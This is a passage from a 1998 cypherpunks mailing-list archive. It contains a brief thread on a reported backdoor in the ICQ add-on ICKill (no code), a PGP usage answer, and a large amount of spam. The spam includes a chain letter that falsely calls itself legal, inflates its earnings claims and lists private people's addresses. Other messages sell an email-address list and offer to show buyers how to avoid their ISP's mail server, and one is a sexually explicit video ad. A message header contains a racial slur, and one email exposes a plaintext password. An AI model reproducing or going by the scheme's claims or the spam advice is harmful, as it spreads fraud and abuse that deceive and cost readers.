Do they show up on ICQ in some useful manner?
(I don't use either of the products....)  Directly notifying them
could help the problem, or at least generate a number of
emails to the author who put the feature in there.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "rocker" <nicholas@doitnow.com>
Date: Thu, 11 Jun 1998 20:22:38 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Masterkey
Message-ID: <000901bd95b1$143660e0$0c2bd3cf@nick>
MIME-Version: 1.0
Content-Type: text/plain




Hello,
 
    I have been trying 
for the last 3 months trying to get a copy of masterkey. I read an artical you 
put on eff.org about masterkey, and how you used it. I was wondering if you 
could tell me were to go and get masterkey or if you could send it to me vie 
E-MAIL or just what. 
 
<FONT color=#000000 face="" 
size=4>                                            
W/B
<FONT color=#000000 face="" 
size=4>                                            
Rocker


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dark Knight <DarkKnight@Elitehackers.org>
Date: Thu, 11 Jun 1998 23:04:32 -0700 (PDT)
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: FWD: backdoor trojan in ICKill
In-Reply-To: <3.0.5.32.19980611174656.008163d0@popd.ix.netcom.com>
Message-ID: <Pine.LNX.3.96.980611225505.1939A-100000@Nigger.EliteHackers.org>
MIME-Version: 1.0
Content-Type: text/plain


> At 11:00 PM 6/10/98 +0200, a remailer user forwarded
> a message From: Bachrach <bachrach@netreach.net>
> about a major security backdoor in ICKill, a utility that
> apparently augments or hangs around ICQ - it's a little-documented
> feature designed into the system rather than a bug or unexpected behaviour.
> More information is at
> > http://members.tripod.com/~hakz/ICQ/index.html 
> ....
> >My last question is this: if one person has backdoors into thousands of
> >computer systems, doesn't that pose some sort of risk to the interent
> >community as a whole? There's one person who's been saying that I should
> >notify the FBI about this. As you can see  decided to start here first.
> 
> Don't tell the FBI - they'll just want to use it themselves.  :-!
> 
> Is there some way to locate and reach ICKill users directly?
> Do they show up on ICQ in some useful manner?
> (I don't use either of the products....)  Directly notifying them
> could help the problem, or at least generate a number of
> emails to the author who put the feature in there.

Well the way I see it the author of ICKill told the company that puts out
ICQ that you have this problem and you need to fix it..  The way he's
looking at it is fix this because it's a problem.  They did not fix it
after his requests to have them fix this so he shared it.  I don't think
he did anything wrong in this case.  Any way like the FBI could figure out
how to use it I don't give them that much credit as it is.  

			|)ark |(night

DEFINITION.
Windows 95: n.   32 bit extensions and a graphical shell for a
16 bit patch to an 8 bit operating system originally coded for
a 4 bit microprocessor, written by a 2 bit company, that can't
stand 1 bit of competition.

Http://www.EliteHackers.org/DarkKnight






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <lists@mailbuggy.com>
Date: Fri, 12 Jun 1998 04:50:58 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: 1,500,000 EMAIL ADDRESSES - $15 !!! ALL FRESH!
Message-ID: <989.283923.142588 lists@mailbuggy.com>
MIME-Version: 1.0
Content-Type: text/plain


HERE IT IS!!  The earnings pontential you have been looking for!  We will 
provide you with 1.5 MILLION EMAIL ADDRESSES FOR ONLY $15. These are all 
fresh addresses with no duplications. They are all sorted and ready to be 
mailed. This is the best deal anywhere today for email lists!  Imagine 
selling a product for only $10 and getting only a 1/100 response. That's 
$150,000!!!  Money making plans, reports, lists, jewelry, art, etc. Whatever 
you wish to sell!  People are making millions of dollars right now by doing 
the same thing! That is why you get so much email from people selling you 
their product....it works! These 1.5 Million email addresses are yours to 
keep, so you can use them over and over and they come on disk or by 
email....your choice. 

If you do not have a program capable of sending bulk email please note it on 
your order form and we will show you where you can download one for free.  We 
will also show you how you can avoid using your ISP's smtp mail server for 
mailing by using software that turns your personal computer into your very 
own personal mail server!

Simply print out this completed order form and send it to us along with your 
check or money order made payable to: F.T.W.I. for only $15.  We also accept 
Visa and Mastercard.  

Send addresses via (circle one):
     EMAIL              MAIL (add $3 for shipping and handling)

Name: _____________________________
Street Address: ________________________City: _______________ 
State: ________________Zip:_____________
Phone number:__________________________
Email:_______________________________ 

Returned checks are subject to $25 NSF Fee


Fill in the following if you are paying with a credit card:

Circle one:        VISA        MASTERCARD
Name as it appears on the card: __________________________
Card number: ______________________________
Expiration Date: ___/___

Signature: ____________________________

Send your order and payment to: 
F.T.W.I. 
4019 Goldfinch, Ste. J
San Diego, CA 92103 
































 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "The Sandwich" <tsandwich@hotmail.com>
Date: Fri, 12 Jun 1998 07:06:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Newbie PGP question
Message-ID: <19980612140606.2770.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


I have a file encrypted with PGP version 2.6.2. Is there a way to view 
ALL the (public) keys that were used to encrypt the  message...  
therefore showing which of Private keys can be used to 
decrypt it?

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Fri, 12 Jun 1998 09:33:05 -0700 (PDT)
To: undisclosed-recipients:;
Subject: Extensis Mask Pro--Now with FREE PhotoAnimator
Message-ID: <bulk.3039.19980612083100@ssl.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


Extensis Mask Pro-The Best-Selling Masking Plug-in for Adobe Photoshop 
http://products.extensis.com/maskpro_P/

If you think professional-quality Masking is a complex, time-consuming process...

Think again.    Think Mask Pro. 

SPECIAL OFFER: Order Mask Pro for $299.95 and get PhotoAnimator FREE! (a $99 value)

Mask Pro is the award-winning Photoshop plug-in that slashes the 
time it takes to create high-quality masks-with results that 
satisfy even the most demanding professional. Just ask MacUser:  
"Mask Pro is lightning fast, easy to learn, and must be ranked 
among the year's top plug-ins".  But you be the judge.

The Advantage?  Color matching. 

Mask Pro's innovative color matching technology lets you decide 
which colors you want to keep and which ones you don't.  Mask Pro 
does the rest.  Using a color eyedropper, simply select which colors 
to keep and which ones to drop.  Then use Mask Pro's Magic Brush to 
wipe away the unwanted colors.  The Magic Brush removes the drop 
colors you selected, leaving a perfect mask-every time.  You have 
complete control.  

Select color thresholds, edge softness, brush sizes, and more.  
With the zoom, pan and navigator window controls, you can easily 
move around in any image.  And, with the unlimited undo/redo, you 
are free to experiment as much as you like. 

The precision and speed of Extensis Mask Pro cuts masking projects 
down to size.

To order, get information, or download a FREE demo, Please visit:
http://products.extensis.com/maskpro_P/

SPECIAL OFFER: Order Mask Pro for $299.95 and get PhotoAnimator FREE! (a $99 value)

Mask Pro is available for both Mac and Windows and is 100% compatible 
with Photoshop 3.05, 4.0 & 5.0.

To order by phone: 1-800-796-9798


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PS. We have made every effort to ensure this message is being sent 
only to people who have expressed interest in Extensis products.  
If we have sent this to you in error, please accept our apologies 
and reply with REMOVE in the subject line for automatic exclusion 
from future communications.  If you know someone who would like to 
be on our mailing list have them send an email to 
listmaster@extensis.com with ADD in the subject line and their 
email address in the body.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 12 Jun 1998 07:26:26 -0700 (PDT)
To: "The Sandwich" <tsandwich@hotmail.com>
Subject: Re: Newbie PGP question
In-Reply-To: <19980612140606.2770.qmail@hotmail.com>
Message-ID: <199806121431.JAA074.07@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <19980612140606.2770.qmail@hotmail.com>, on 06/12/98 
   at 07:06 AM, "The Sandwich" <tsandwich@hotmail.com> said:

>I have a file encrypted with PGP version 2.6.2. Is there a way to view 
>ALL the (public) keys that were used to encrypt the  message...  
>therefore showing which of Private keys can be used to  decrypt it?

If you have PGP 2.6.x and you run PGP from the commandline:

c:> pgp.exe <encrypted_file>

If no keys are available in the secring.pgp file to decrypt the message
then PGP will display all the keys the file is encrypted with.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: How do you make Windows faster?  Throw it harder!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNYE7v49Co1n+aLhhAQFABAQAkIxiYhrfC9XmkyQ9Z+2zCdljFTmPwLKT
G4LieJdW8SbBDxn45A5bPLTdrCR7PmRguOFi54u+PouR3BEfT1319j7LltJmNjRX
7CFyGjjiQFoLDg4c0w2B0A6zxGRFahUKWdekAcxgY/4emmfPoINEuZ2voEb6uIsb
a6bRRj+7qdE=
=P/8j
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ARC Staffing <arcinc@usaor.net>
Date: Fri, 12 Jun 1998 10:24:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Position
Message-ID: <3581646C.D2569F4A@usaor.net>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to intrude on everyone, but I'm looking  to fill a position in the
Northern Virginia area.  I'm looking for a secure messaging engineer,
dealing heavily in S/MIME and/or PGP.  It is a very llucrative spot for
the person with the right qualifications.  If anyone could help me, I
would appreciate it.

Nate Stanton
ARC Staffing
412-422-1159
arcinc@usaor.net

P.S. If this is out of line, let me know, and I'll apolizgize profusely.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mscompia@microsoft.com
Date: Fri, 12 Jun 1998 15:53:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Information From The Microsoft Personal Information Center
Message-ID: <0be172752220c68UPIMSSMTPSYS08@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is your password you requested from the Microsoft Personal Information Center at http://register.microsoft.com/regwiz/personalinfo.asp.

Password: writecode

If you continue to have access problems or want to report other issues, please contact us through the Write Us button at the top of any Microsoft page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Fri, 12 Jun 1998 00:15:58 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Live coverage of Qld State Elections
Message-ID: <1.5.4.32.19980612070530.00a09700@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW,

I am delighted to inform you that One Nation now has its own domain.

Check out:
http://www.onenation.com.au

To follow the Qld State election live tomorrow night take the Qld State
Election link and then the "LIVE" coverage link.

Shortcut:
http://www.gwb.com.au/onenation/qldstate/june13

The new IRC details will be put up tomorrow night.

Look forward to catching up with you on-line....

GWB




Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Date: Fri, 12 Jun 1998 15:00:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Position
In-Reply-To: <3581646C.D2569F4A@usaor.net>
Message-ID: <2c9eb8084c133e9e90937dfe2b72d83e@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jun 1998 13:25:00 -0400  ARC Staffing <arcinc@usaor.net> wrote:

>Sorry to intrude on everyone, but I'm looking  to fill a position in the
>Northern Virginia area.  I'm looking for a secure messaging engineer,
>dealing heavily in S/MIME...

Isn't that a double negative? Hee, hee!



 -+DiGiTaL+-









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tonya@e-web2.net
Date: Fri, 12 Jun 1998 23:18:17 -0700 (PDT)
Subject: Your Adult Website Password
Message-ID: <199806130618.XAA15554@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This message is for adults 21+ only.
If you are not 21+ or do not wish to
view adult images please delete this message.
==============================================================
Looking For Live Hidden Camera Video?
Looking For 23 Live Girl Feeds?
Looking For A Site That Won't Charge you To Chat With the Ladies?
Looking For A Site That Won't Break the Bank?

http://www.e-web2.net/tonya/

Love Tonya
================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nycfood@prontomail.com
Date: Sat, 13 Jun 1998 04:14:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Free Gourmet Food
Message-ID: <199806131114.EAA11496@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


THE MOST DELICIOUS FOOD ON THE INTERNET IS AT

            NEW YORK CITY GOURMET FOOD

Your name may be selected to receive a free gourmet food
gift.  Just visit, http://www.usaserve.net/nycfoods, and
make a complete entry into the Guest Book.  Please write 
JUNE GIFTS in the comment box and, if your name is one of
three selected your gift will arrive by express messenger.

Make a purchase during your and visit you may also receive,
just in time for the outdoor season, a copy of one of
America's best Barbeque cook books, LICENSE TO GRILL.
Please write JUNE GIFTS in the comment box of your order.

http://www.usaserve.net/nycfoods is offering free gourmet
food gifts each month but, you must sign the Guest Book
on or after the first day of each month to be eligible.

To be deleted from the mail list, please respond with
remove in the subject line and press the reply button.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: derok@caryys.com
Date: Sat, 13 Jun 1998 13:56:24 -0700 (PDT)
To: aadr@ey.com
Subject: mach 101111
Message-ID: <0a0b21151200d68UPIMSRGSMTP05@msn.com>
MIME-Version: 1.0
Content-Type: text/plain




ALL YOU DO IS ADVERTISE THIS 800 NUMBER! THAT'S ALL!!


$100 goes to you for EVERY sale that the company closes!


Does the idea of making at least $1,000 per week beginning your 2nd
week of doing business excite you?

How about never having to sell a thing to your customer and never
having to talk to ANYONE to make money? I don't know how this could
 get any easier.

EVERY aspect of selling or talking to someone is DONE COMPLETELY by the 
company!

The number one home based business for the 2nd year in a row, Fortune
5000 is a member of the Better Business Bureau and the U.S. Chamber of
Commerce.

WHAT THIS BUSINESS WILL DO FOR YOU:

* Handles all your calls, closes your sales, and sends you WEEKLY commission checks!



* It pays you a $100 commission (that's over 50% of the total sale)
  for EVERY sale. CHECKS put $$$ in your pocket in less than your     
first week or two... Quick commission earnings build and maintain
  motivation.
  
ALL YOU DO IS ADVERTISE the toll-free number and your ID number.


* You can get STARTED TODAY. Just advertise the business toll-free
  number with your ID # and let this business CLOSE YOUR SALES every
  day...They do all the work and YOU GET PAID FOR IT!


* You may advertise any way you choose: Bulk E-Mail, Flyers,
  Classifieds, Postcards, etc. Suppose you use bulk E-Mail, as I am:    
100,000 E-Mails with a 1/10th of a percent (0.1%) sales rate at $100   
per sale nets $10,000... not too bad.


There is nothing else out there that will provide you with an immediate 
income beginning THIS WEEK with minimal effort.


Before you call, I want you to think about the quality of the live
operators handling your call. I am convinced you will not find
a better team of closers for your own personal sales.  You will
clearly understand what I am talking about once you call.


PLEASE DON'T LET THIS PASS YOU BY. MAKE THE CALL!!


                            1-800-811-2141


You will be asked for ID #55107 when you call.


(Live operators are available from 8 AM-10 PM CST Monday through
Saturday and will be able to answer any questions you may have.)


Call one of the 24hr TESTIMONIAL lines at 888-703-5389, 888-446-6949,
888-446-6951 or 888-731-3457 (all toll free).



                     To be removed, please press reply and type "Remove"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lawyer@XUDI.aol.com
Date: Sat, 13 Jun 1998 16:14:23 -0700 (PDT)
To: cypherpunks@TMVD.toad.com
Subject: THIS WILL CHANGE YOUR LIFE -AFUX
Message-ID: <199806132314.QAA20638@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


cypherpunks

Read this it will change your life.

If you are not interested please excuse me for interrupting your 
day and 
just hit delete and I do apologize for any inconvenience.

This is a letter I received, many, many, many times, and just 
deleted, 
but finally I said to myself what the heck I'll give it a try. 
To my 
amazement DOLLAR BILLS just keep coming in everyday!  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Greetings

I am a retired attorney, and about two years ago a man came to 
me with a 
letter. The letter he brought me is basically the same as the 
letter in 
front of you now. He asked me to verify the fact that this 
letter was 
legal. I advised him to make a small change in the letter and it 
would 
be 100% legal.

When I first read the letter, I thought it was some off-the-wall 
idea to 
make money. I was curious about the letter, so I asked him to 
keep me 
updated as to his results. About two months later he called to 
tell me 
that he had received over $800,000 in cash! I didn't believe him 
so he 
asked me to try the plan and see for myself. I followed the 
instructions 
exactly and mailed out 200 letters. Sure enough, the money 
started 
coming! It came slowly at first, but after three weeks I was 
getting 
more than I could open in a day. I kept a precise record and 
after about 
three months my earnings were $868,439. I decided to try the 
letter 
again, but this time I sent 500 letters out. Well, three months 
later I 
had totaled $2,344,178.00!!! I just couldn't believe it. 

I met my old client for lunch to find out how this exactly 
works. He 
told me that there were a few similar letters going around. What 
made 
this one different is the fact that there are six names on the 
letter, 
not five like most others. That fact alone resulted in far more 
returns. 
The other factor was the advice I gave him in making sure the 
whole 
thing was perfectly legal, since no one wants to risk doing 
anything 
illegal. 

I bet by now you are curious about what little change I told him 
to 
make. To be legal, anyone sending a dollar must receive 
something in 
return. So when you send a dollar to each of the six names on 
the list, 
you must include a slip of paper saying, "Please put me on your 
mailing 
list" and include your name, mailing address, and email address. 
This is 
the key to the program! The item you will receive for a dollar 
you send 
to the six names below, is this letter and the right to earn 
thousands.

Follow the simple instructions below exactly, and in less than 
three 
months you could receive over $800,000.

A) Immediately send US $1 to each of the six people on the list 
below. 
Wrap the dollar in a note saying,"Please add me to your mailing 
list" 
and include your name, mailing address, and email address.

1) HEPALTA - 16406 - 117 Avenue, EDMONTON, Ab. Canada T5M3W2

1) Fred Ball - 1092 Adobe Canyon Rd., Kenwood, California 95452

2) G.W. Smith - 7082 Woolworth Rd., Shreveport, Louisiana 71129

3) T. Perdue 130 Dalzell St. Shreveport, Louisiana 71104

4) S.Hawryluk 5520 Bellechasse, Montreal,Quebec.Canada H1T-2B8

5) Raymond Lal, P. O. Box 1122. Regina. Sk.Canada, S4P 3B4

6) D. Dilley, P.O. Box 551, Wathena, KS  66090

B) Remove the name next to #1 on the list and move the rest of 
the names 
up one position. Then place your name in the #6 spot. This is 
best done 
by saving to a text file and editing it yourself and saving the 
new 
edited copy. Or type a new list and glue it over the old one.

C) You can mail your new letter out in two ways: 

    1) Through the U.S. Postal Service or 

    2) through e-mail. 

This letter has been proven perfectly legal for both ways as 
long as you 
follow the above instructions, because you're purchasing 
membership in 
an exclusive mailing list. To mail this out over the internet, 
you can 
browse through areas and find people to send this to all the 
time. All 
you have to do is cut and paste email Addresses wherever you are 
on the 
Internet. Remember, it doesn't cost anything to mail on the 
Internet. Or 
you can get a bulk email service to mail it out in large volumes 
for 
you. 

One that we recommend is:

Progressive Internet Communications Co specializing in targeted 
and bulk 
mailings (Very reasonable. Call for pricing.) (407) 956-1151 
P.O. Box 
100512, Palm Bay, FL. 32910-0512. 

If you are going to use the traditional U.S. Postal Service to 
do this 
program, you will want to order a minimum 200 names from a 
mailing list 
company. 

For the most effective for these lists are:

Advon Distributors ($28 / 200 names) P.O. Box B-11 Shelly, ID 
83274
(800) 992-3866. 

*Keep in mind- there is no limit to the amount of names you can 
send 
out. The more names you send, the more money you'll make. We 
strongly 
encourage you to mail this letter to family, friends and 
relatives as 
well.*

D) Be sure to send out at least 200. You should receive over 
$800,000.

E) Keep a copy of this letter and all the names you receive. 
Mail it Out 
again in about 6 months. But mail it to the addresses you 
received with 
each dollar. It will work again, only much better.

THIS IS A SERVICE AND IS 100% LEGAL !

(Refer to title 18, Section 1302 & 1342 of the U.S. Postal and 
Lottery 
Laws). Assume for example you get a 7.5% return rate, which is 
very 
conservative. My first attempt was about 9.5% and my second time 
was 
over 11%.

1)When you mail out 200 letters, 15 people will send you $1
2)Those 15 mail out 200 letters, 225 people will send you $1
3)B29Those 225 mail out 200 letters, 3,375 people will send you 
$1
4)Those 3,375 mail out 200 letters, 50,625 people will send you 
$1
5)Those 50,625 mail out 200 letters, 759,375 people will send 
you $1
6)At this point your name drops off the list at earnings of 
$813,615.00!

It works every time, but how well depends on how many letters 
you send 
out. In the example above, you mailed out 200 letters, if you 
mailed out 
500 letters, you would have received $2,006,917!!

Check the math yourself, I want you to, but I guarantee it is 
correct! 
With this kind of return, you've got to try it. Try it once and 
you will 
do it again!!! Just make sure you send a dollar to each of the 
six names 
on the list with a note to be added to their mailing list. 
Together we 
will all prosper!!!!

PS You've read this far, so let me ask you one simple question:

Q. What do you have to lose??

A. Only $6

What you can gain is an income, like the example in this letter. 
Small Risk, Small Expense, 
HUGE Potential Return!!! 
What do you have to lose? 
I invite you to join our mailing list today!!!

THANK YOU AND I KNOW YOU WILL BE FINANCIALLY 
REWARDED.______________________________________________________

D. Dilley  .   Attorney at law






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sat, 13 Jun 1998 18:47:05 -0700 (PDT)
To: jy@jya.com
Subject: JUN 12'98
Message-ID: <35832AE3.2331@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Saturday 6/13/98 7:08 PM

John Young

Got an envelope size 9x1/4 x 11 7/8 in the mail today postmarked

  ALBUQUERQUE NM

  JUN 12'98

from 

  U.S. Department of Justice
  United States Attorney
  District of New Mexico
  POB 607
  Albuquerque, NM 87103

  Official Business
  Penalty for Private use $300.

My guess is about 4-7 page.  

Paper clip at lower right side.

If last letter from Mitchell is any indication of rational
behavior, then my guess that this will eclipse the former.

http://jya.com/usa052098.htm

But I did not open it.  This is a weekend.  I have principles.

NO envelope was received from court in response to 

http://jya.com/whp052898.htm

I will fax contents of U.S. Department of Justice envelope
as soon as we open it.

We must ALL keep a good sense of humor.

A mathematician, physicist, and engineer we all asked to calculate
the volume of a red rubber ball.

The mathematician measured the diameter, then solved a triple integral
to find the volume.

The physicist submerged the red rubber ball in a vessel of water
to measure its displacement.

The engineer looked it up in his red rubber ball handbook.  

http://jya.com/da/whpda.htm

Later
bill

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <wingsaffiliate@neworleans.org>
Date: Sun, 14 Jun 1998 02:24:02 -0700 (PDT)
Subject: Aviation Internet Marketer
Message-ID: <989.283923.115890 wingsaffiliate@neworleans.org>
MIME-Version: 1.0
Content-Type: text/plain



To:  Aviation Internet Marketer
From:  Sgt. Hack, CEO,  U.S. Wings, Inc. 

Succeed by association with 
PILOT SHOPS, the hot new Aviation  
Affiliate Opportunity from U.S.WINGS INC. 

U.S.Wings, Inc. is featured in the new, McGraw Hill 
book due out September 1:

"StrikingItRich.com: Profiles of 23 Incredibly Successful 
Websites...That You've Probably Never Heard Of"
by Jaclyn Easton
Foreword by Jeff Bezos, Founder & CEO, Amazon.com, Inc.

Become a PILOT SHOPS Affiliate today and I'll send you an 
autographed copy of the new book at my cost after September 1. 

The U.S Wings PILOT SHOPS affiliate program pays you 8.1/3 % 
on all sales referred from your site. All you have to do is 
display 
the GOLD WINGS logo and PILOT SHOPS link (below) on your main 
page!
There's no risk and no cost. Your ongoing income could be 
significant.

The PILOT SHOPS offers an extensive line of genuine leather 
jackets, 
peacoats and aviation ball caps.  A line of Aviation theme 
T-shirts 
and computer mouse pads will be added in the next few weeks 
with plans to expand all lines as time progresses.

Please check it out.

>HREF="http://www.mustangone.com/uswings/pilotshop/govtissue.mv?A
SSOCIATE_ID">
Come shop at the...
<IMG 
SRC="http://www.mustangone.com/uswings/pilotshop/uswlgops.gif"
BORDER="1" ALT="U.S. Wings Pilot Shop, Aviation leather goods, 
caps,
t-shirts and more!" WIDTH="220"
HEIGHT="61">

Get started now and profit by association in the success in U.S. 
Wings, Inc.

Become a U.S. Wings PILOT SHOPS Affiliate today.
No cost. No risk. It's easy!
Simply REPLY with the information requested below. 

U.S. WINGS PILOT SHOPS 
  ~ Affiliate Application ~

    _X_  YES!  I wish to become a U.S Wings Pilot Shop Affiliate.

    _ _  Sorry. I cannot participate at this time.

    Company name:
    Contact name:
    Address:
    City:
    State/Province:
    Postal code:
    Country:
    URLs of your web sites:
    E-mail address of contact:
    Phone with area code:
    Comments / Questions:

Upon receiving your PILOT SHOPS application, U.S. Wings will 
email you an Associate ID which is to be substituted into the 
HTML
source code in the indicated position as described above...  
that's it!  
It's too easy.

Entry into the PILOT SHOPS will ONLY be through GOLD WINGS links 
on 
associates' web pages.  There will be no other direct access to 
the site! 

Get started now and begin sharing in U.S. Wings' phenomenal 
success.

Best regards,
Sgt. Hack, CEO
U.S. Wings, Inc.
Pilot Shops Internet Affiliate Program
..
P.s.
I hope you enjoyed reading about our new PilotShops.
However, if you'd rather not receive any future notices 
from US Wings, please send an e-mail message to 
mailto:no_no_thanku@mailexcite.com 
with DELETE in the Subject to be immediately 
removed from any future US Wings Aviation offerings.
Thank you.























av
89-t
13-6
c_2
d-5
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olive369@hotmail.com
Date: Sat, 13 Jun 1998 23:57:36 -0700 (PDT)
Subject: Your Friends Will Want To See These!
Message-ID: <QQetrv12753.199806140657@relay1.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain




Attention!
Warning! Adults Only!                    Warning! Adults Only!

If you are under 21 years of age, or not interested in sexually 
explicit material... please hit your keyboard delete button now
and please excuse the intrusion.  To REMOVE your name from our
mailing list, send us email with REMOVE in the subject line.  You
need not read any further!


Available NOW for only $9.95!  Next 10 Days Only!

WORLD RECORD SEX!

Be There!  See It Now On Video!  Unbelievable ...But True!

You Won't Believe Your Eyes!!!  [As Seen on the Howard Stern Show]

"The World's Biggest Gang Bang"

See sexy  Annabel Chong as she sets the world Gang Bang Record
in this fantastic video documentary that chronicles her 24 hour
sexathon with 251 men engaging in sexual intercourse and oral
sex with her!  Don't worry, you won't have to stay up 24 hours
to watch it all.  We've selected only the most exciting and red
hot scenes for you...all in breathtaking living color with plenty of
extreme close-ups!  This video is guaranteed to knock your socks
off and leave you breathless!  You've never seen anything like it!
Annabel takes on five men at a time!  90 minutes! Order Today!
Only $9.95 plus $3 shipping and handling [Total $12.95].


"GANG BANG II"
The Record Breaker!!!  Starring Jasmin St. Claire!

See Beautiful and Voluptious Jasmin St. Claire shatter Annabel's
gang bang record by taking on 300 men in one 24 hour sex session!
You won't believe your eyes at all the hot firey action that you will
see as the new world record is established before your eyes as
Jasmin  takes on five men at a time for sexual intercourse and
oral sex!  Your friends will break down your door to see this video!
You'll be the most popular guy in town!  The action is truly unreal 
and you will see the best of it in living life-like color!  Order Today
and see Jasmin break the record!  90 minutes.  Only $9.95 plus
$3 shipping and handling [total $12.95].

Also Available...

The Uncensored Authentic Underground...
Pamela Anderson Lee & Tommy Lee
Sex Video Tape!

Everyone is talking about this exciting video!  See Pam and 
Tommy engaging in sexual intercourse and oral sex in the car,
on the boat and much, much more!  A  real collectors video! 30 minutes.
Only $9.95 plus $3 shipping and Handling [total $12.95]

"Tonya Harding Wedding Night Sex Video"
Now see the beautiful Ice Skating Shame of the Olympics
Tonya Harding engaging in sexual intercourse and oral 
sex on her wedding night with husband Jeff Gillooly!
This "Bad Girl" is Hot!  Don't miss this video! 30 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

"Traci...I Love You"  Starring Traci Lords
Now see the most beautiful and popular porn star in her last
adult video before she hit the big time!  It's the blockbuster of
the year...sensual...fiery and exposive!  Traci Lords in her most
erotic and controversial film ever!  Don't Miss It!  90 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

EMAIL SPECIAL!

ORDER ANY FOUR VIDEOS AND GET THE FIFTH ONE FREE!!!

Your order will be shipped via First Class Mail. All Shipments in plain unmarked wrapper.
For Priority Mail - Add $5
For Overnight Express - add $15

You can order by Phone, Fax, Mail or Email.

We accept all Major Credit Cards and checks by phone or fax.
Visa - MasterCard - American Express - Discover

10 Day Money Back Guarantee!  We know that you will be pleased with these Videos!

To Email your order - DO NOT HIT REPLY ON YOUR KEYBOARD

Send email to our special email address below:

zena456@juno.com

[Note: If you order by email and do not receive an email acknowledgement within 24 hours, please phone our office at
718-287-3800]

Phone our office 9am to 10 pm [eastern time]

[718] 287-3800 to Order By Phone for FASTEST SERVICE!

 We can accept your credit card or check by phone

Fax Your Order 24 hours per day  to  [718] 462-5920
You can fax your credit card information or your check

Order by mail by sending $12.95 per video,  cash, check, money order or major credit card [Visa, MasterCard, American Express or Discover] to

TCPS, INC.
4718  18th Ave.  Suite 135
Brooklyn, NY 11204

Make Checks & Money Orders Payable to TCPS, Inc.
New York State Residents Please Add 85 cents for Sales Tax per Video!

You must be over 21 years of age to order and give us your date of birth with your order!

The Following Order Form is for Your Convenience!

.............................................................................................................




Please ship me the following video tape[s]!

Qty___________Annabel Chong "World's Biggest Gang Bang"

Qty__________"Gang Bang II" Jasmin St. Claire

Qty___________"Pamela & Tommy Lee Sex Video Tape"

Qty_________   "Tonya Harding Wedding Night Sex Video Tape"

Qty__________"Traci I Love You" Traci Lords

at $9.95 each plus $3.00 for shipping and handling per tape
[$12.95 per video or "SPECIAL $51.80 for ALL FIVE"!

Credit Card #______________________________Exp Date___

I hereby represent that I am over 21 years of age.  
My date of birth is_________________________________

Signature______________________________________________

Ship to:  Name_______________________________________

Address____________________________________________

City________________________State___________Zip________

Area Code and Home Phone  [    ]___________________________

Fax # [     ]______________________________________________

Email Address___________________________________________

To remove your name from our mailing list, send us an email with 
remove in the subject line.  This is a one time offer and you should not hear from us again!

